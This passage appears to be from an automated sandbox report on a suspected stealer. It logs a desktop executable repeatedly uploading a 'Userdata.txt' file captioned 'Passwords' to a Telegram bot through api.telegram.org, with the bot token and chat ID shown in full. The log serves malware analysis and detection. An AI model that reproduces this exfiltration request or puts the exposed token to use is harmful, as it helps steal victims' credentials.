                                                                                                            2025-01-10 20:54:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 36 30 65 61 31 38 63 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32d60ea18c5fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:05 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:05 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:05 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44744,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542445,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.550016149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:06 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32e8a22dce36
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 38 61 32 32 64 63 65 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32e8a22dce36Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:06 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:06 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:06 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44745,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542446,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.550018149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:08 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32fb286e642d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 62 32 38 36 65 36 34 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32fb286e642dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:08 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:08 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44746,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542448,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.550020149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:09 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd330da1445301
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 64 61 31 34 34 35 33 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd330da1445301Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:10 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44747,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542450,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.550022149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:11 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33200b7db480
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 30 30 62 37 64 62 34 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33200b7db480Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:12 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:12 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:12 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44748,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542452,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.550024149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:13 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3333b82a72fe
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 33 62 38 32 61 37 32 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3333b82a72feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:13 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:13 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:13 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44749,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542453,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.550026149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:15 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd334605e9befd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 36 30 35 65 39 62 65 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd334605e9befdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:15 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:15 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:15 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44750,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542455,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.550028149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:17 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd335d7b5fd182
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
